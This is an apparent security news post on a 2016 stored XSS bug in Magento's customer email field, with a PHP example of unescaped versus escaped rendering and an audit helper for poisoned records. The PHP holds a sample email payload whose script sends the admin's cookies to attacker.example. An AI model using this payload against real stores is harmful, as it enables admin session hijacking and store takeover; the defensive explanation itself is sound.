New XSS Bug Discovered in Magento

Posted on the 26th January 2016

The Magento project has just published a security patch that fixes a critical cross-site scripting (XSS) bug which can be used to take over an online store. The vulnerability is a stored XSS in the way customer email addresses are handled by the system.

When a user registers a new account or changes the email address on an existing one, the platform does not validate the value entered in the email field. Characters that have no place in an email address, such as angle brackets and quotes, are accepted and stored as part of the customer record, and the stored value is later written into admin pages without being escaped. This lets an attacker plant HTML and script in the field.

Easy to Exploit

The bug is trivial to exploit and needs no special skill. The attacker places an order from an account whose email address has been ‘poisoned’ in this way; when the store owner opens that order in Magento’s admin panel, the stored payload is rendered as part of the page and runs in the administrator’s browser.

Because the payload can be JavaScript, it runs in the context of the administrator’s session: it can read the admin’s cookies and send them to the attacker, who then uses them to log in to the admin panel. Even where the session cookie is marked HttpOnly and cannot be read by script, code running in the admin’s browser can still issue requests to the admin panel on the administrator’s behalf, so the outcome is much the same. Other payloads are possible as well.
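The pattern described above, shown in plain PHP as an added example (this is not Magento’s code, and the function names, the sample addresses and the audit helper are this example’s own): a customer email value is concatenated into admin HTML unescaped, then the same value is rendered with HTML encoding on output, and an input check and an audit helper are shown beside it.

```php
<?php
// Added example: vulnerable vs. hardened handling of a customer email address
// that is stored at registration and later rendered in an admin order view.
// Plain PHP only; no Magento APIs. All names here are this example's own.

declare(strict_types=1);

// Constructed sample: a "poisoned" address as an attacker would submit it.
// It breaks out of the td element and runs script in the admin's browser.
const POISONED_EMAIL = 'buyer@example.com"><script>document.location="http://attacker.example/?c="+document.cookie</script>';
const CLEAN_EMAIL    = 'buyer@example.com';

// Constructed sample of the caveat: RFC 5321 allows a quoted local part,
// and PHP's FILTER_VALIDATE_EMAIL accepts this address even though it
// carries a script tag. Input validation alone does not stop it.
const QUOTED_LOCAL_PART = '"<script>alert(1)</script>"@example.com';

// Vulnerable pattern: the stored value is concatenated straight into HTML.
function renderOrderRowUnsafe(string $email): string
{
    return '<td class="customer-email">' . $email . '</td>';
}

// Hardened pattern: HTML-encode on output, whatever was stored.
// ENT_QUOTES also encodes single quotes, which matters inside attributes.
function renderOrderRowSafe(string $email): string
{
    $escaped = htmlspecialchars($email, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<td class="customer-email">' . $escaped . '</td>';
}

// Defence in depth at input time: reject anything that is not a
// syntactically valid address. filter_var() returns the address or false.
function validateEmailInput(string $email): ?string
{
    $valid = filter_var(trim($email), FILTER_VALIDATE_EMAIL);
    return $valid === false ? null : $valid;
}

// Audit helper for a store that was live before patching: flag stored
// addresses that fail validation or contain HTML metacharacters. The
// apostrophe is deliberately not flagged because it is legal in addresses
// (o'brien@example.com); output escaping is what makes it harmless.
function findPoisonedEmails(array $emailsById): array
{
    $flagged = [];
    foreach ($emailsById as $id => $email) {
        if (validateEmailInput($email) === null || preg_match('/[<>"]/', $email) === 1) {
            $flagged[$id] = $email;
        }
    }
    return $flagged;
}

// Stand-alone demo: php this_file.php
$rows = [
    101 => CLEAN_EMAIL,
    102 => POISONED_EMAIL,
    103 => "o'brien@example.com",
    104 => QUOTED_LOCAL_PART,
];

echo "Unsafe render of the poisoned address:\n", renderOrderRowUnsafe(POISONED_EMAIL), "\n\n";
echo "Safe render of the same address:\n", renderOrderRowSafe(POISONED_EMAIL), "\n\n";

foreach ($rows as $id => $email) {
    printf("%d  input validation: %s\n", $id, validateEmailInput($email) === null ? 'rejected' : 'accepted');
}
echo "\nAudit flagged record ids: ", implode(', ', array_keys(findPoisonedEmails($rows))), "\n";
```

The point the demo makes is that validation at the email field is worth having but is not the fix: record 104 is a syntactically valid address that still carries a script tag, and only the escaped renderer neutralises it. Treat any stored value as untrusted at the point where it is written into a page.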

This gives the vulnerability a severity rating of 7 on a scale of 1 to 10, so it is very serious. Interestingly, it is similar to a bug discovered in Jetpack for WordPress in October 2015. The Magento issue affects versions 1.9.2.2 and older of the Community Edition and versions 1.14.2.2 and older of the Enterprise Edition. The newly released Magento 2.0 does not suffer from this particular XSS issue, although a different stored XSS vulnerability does affect that version.

If you have not yet migrated to Magento 2.0, install the security update for Magento 1.x. If you are a Magento 2.0 user, update to the latest version. The updates are free for all users, so there is no reason not to apply them.

Installing an incremental update is almost always easier than migrating from 1.x to 2.0, and should not require significant store downtime. Since the patch fixes the code and not the data, it is also worth checking existing customer records for email addresses that contain HTML characters, as those were accepted before the update. Leaving a site unpatched is a serious risk: automated attack scripts are widespread, and even small stores have a high chance of being targeted.